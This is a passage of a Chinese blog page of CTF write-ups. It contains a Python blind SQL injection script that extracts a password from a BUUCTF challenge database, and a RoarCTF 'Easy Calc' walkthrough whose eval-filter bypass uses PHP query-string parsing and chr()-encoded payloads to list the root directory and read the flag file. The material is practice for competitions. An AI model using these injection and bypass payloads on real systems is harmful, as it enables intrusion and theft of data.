class="title">get_res</span>():</span></span><br><span class="line">    result = <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">10</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> zidian:</span><br><span class="line">            </span><br><span class="line">            <span class="built_in">print</span>(j)</span><br><span class="line"></span><br><span class="line">            <span class="comment">#获取数据库名</span></span><br><span class="line">            <span class="comment">#payload = &quot;http://4700bcda-d7ff-4598-a011-d53dff3c4237.node3.buuoj.cn/check.php?username=1&#x27; or 1=1 and if((ascii(substr(database(),&#123;0&#125;,1))=&#123;1&#125;),1,0) -- -&amp;password=1&#x27; or 1=1  &quot;.format(i,ord(j))</span></span><br><span class="line"></span><br><span class="line">            <span class="comment">#获取数据表名 控制limit获取其他表</span></span><br><span class="line">            <span class="comment">#payload = &quot;http://4700bcda-d7ff-4598-a011-d53dff3c4237.node3.buuoj.cn/check.php?username=1&#x27; or 1=1 and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),&#123;0&#125;,1))=&#123;1&#125;),1,0) -- - &amp;password=1&#x27; or 1=1  &quot;.format(i,ord(j))</span></span><br><span class="line">            </span><br><span class="line">            <span class="comment">#获取字段名</span></span><br><span class="line">            <span class="comment">#payload = &quot;http://4700bcda-d7ff-4598-a011-d53dff3c4237.node3.buuoj.cn/check.php?username=1&#x27; or 1=1 and if(ascii(substr((select column_name from information_schema.columns where table_name=&#x27;geekuser&#x27; limit 3,1),&#123;0&#125;,1))=&#123;1&#125;,1,0) -- - &amp;password=1&#x27; or 1=1&quot;.format(i,ord(j))</span></span><br><span class="line"></span><br><span class="line">            <span class="comment">#获取字段值</span></span><br><span class="line">            payload = <span class="string">&quot;http://4700bcda-d7ff-4598-a011-d53dff3c4237.node3.buuoj.cn/check.php?username=1&#x27; or 1=1 and if(ascii(substr((select password from geekuser limit 0,1),&#123;0&#125;,1))=&#123;1&#125;,1,0)  -- - &amp;password=1&#x27; or 1=1&quot;</span>.<span class="built_in">format</span>(i,<span class="built_in">ord</span>(j))</span><br><span class="line">            </span><br><span class="line">            <span class="built_in">print</span>(payload)</span><br><span class="line">            flag = requests.get(payload)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;Success&quot;</span> <span class="keyword">in</span> flag.text:</span><br><span class="line">                result = result + j</span><br><span class="line">                <span class="built_in">print</span>(result)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(result)</span><br><span class="line">            <span class="comment">#return result</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(get_res())</span><br><span class="line"><span class="comment"># payload = &#x27;http://127.0.0.1/sqli/Less-6/?id=1&quot; and if(ascii(substr((select database()),1,1))=115,1,0) -- -&#x27;</span></span><br><span class="line"><span class="comment"># flag = requests.get(payload)</span></span><br><span class="line"><span class="comment"># print(flag.text)</span></span><br><span class="line"><span class="comment"># if &quot;You are in&quot; in flag.text:</span></span><br><span class="line"><span class="comment">#     #dbname += j</span></span><br><span class="line"><span class="comment">#     print(45678)</span></span><br></pre></td></tr></table></figure>

<h2 id="RoarCTF-2019-Easy-Calc"><a href="#RoarCTF-2019-Easy-Calc" class="headerlink" title="[RoarCTF 2019]Easy Calc"></a>[RoarCTF 2019]Easy Calc</h2><p>表面上是个计算题。。</p>
<p>看源码发现有个calc.php</p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703182146359.png" alt="image-20200703182146359"></p>
<p>访问一下，看到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">        <span class="variable">$blacklist</span> = [<span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;\t&#x27;</span>, <span class="string">&#x27;\r&#x27;</span>, <span class="string">&#x27;\n&#x27;</span>,<span class="string">&#x27;\&#x27;&#x27;</span>, <span class="string">&#x27;&quot;&#x27;</span>, <span class="string">&#x27;`&#x27;</span>, <span class="string">&#x27;\[&#x27;</span>, <span class="string">&#x27;\]&#x27;</span>,<span class="string">&#x27;\$&#x27;</span>,<span class="string">&#x27;\\&#x27;</span>,<span class="string">&#x27;\^&#x27;</span>];</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$blacklist</span> <span class="keyword">as</span> <span class="variable">$blackitem</span>) &#123;</span><br><span class="line">                <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/&#x27;</span> . <span class="variable">$blackitem</span> . <span class="string">&#x27;/m&#x27;</span>, <span class="variable">$str</span>)) &#123;</span><br><span class="line">                        <span class="keyword">die</span>(<span class="string">&quot;what are you want to do?&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="string">&#x27;echo &#x27;</span>.<span class="variable">$str</span>.<span class="string">&#x27;;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>有个eval函数！！！但是要绕过前面的限制，num变量中不能包含空格、斜杠等</p>
<p>而且，测试了一下，当num变量为字符串时，会forbidden。。原网页代码中有句话，有waf。。</p>
<p>不会了，看了一下网上的WP，知道了一个PHP解析漏洞。</p>
<h3 id="php解析漏洞"><a href="#php解析漏洞" class="headerlink" title="php解析漏洞"></a>php解析漏洞</h3><ul>
<li>当PHP将查询字符串（在URL或正文中）转换为内部$_GET[‘’]或$__POST[]关联数组时，在将查询字符串进行解析时，会将某些字符删除或用下划线替代，也就是说，当输入 %20num (%20为空格的URL编码)时，在PHP进行解析时，会自动解析为num</li>
<li>例子1</li>
</ul>
<p>test.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;test&#x27;</span>];</span><br><span class="line">  <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703190119747.png" alt="image-20200703190119747"></p>
<p>参见文章：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/181682">https://www.anquanke.com/post/id/181682</a></p>
<p>现在我们有绕过WAF的方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%20num=phpinfo()</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/fdsvdfgrth.png" alt="fdsvdfgrth"></p>
<p>扫描根目录下的文件，但是/被过滤了，可以用chr(47)绕过，47是/的ascii码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%20num=var_dump(scandir(chr(47)))</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703191256119.png" alt="image-20200703191256119"></p>
<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/vdfvrtyhg.png" alt="vdfvrtyhg"></p>
<h2 id="HCTF-2018-admin"><a href="#HCTF-2018-admin" class="headerlink" title="[HCTF 2018]admin"></a>[HCTF 2018]admin</h2>
      
    </div>
    <div class="article-footer">
      
    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2020/06/27/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87/" title="网络设备期末"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;上一篇</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2020/04/30/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="渗透测试学习笔记"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  
  <div class="bar-right">
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>



    <script>
(function ($) {
    $('.search-form').on('submit', function (e) {
        var keyword = $('.search-form-input[name="wd"]').val();
        window.location = 'https://www.baidu.com/s?wd=site:example.com ' + keyword;
        return false;
    });
})(jQuery);
</script>




   
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: true,
    appId: 'WetpnnRktzaJO5JS3yPOQQp0-gzGzoHsz',
    appKey: 'XgnRQLNAQtMdxfLXbucXTWrM',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>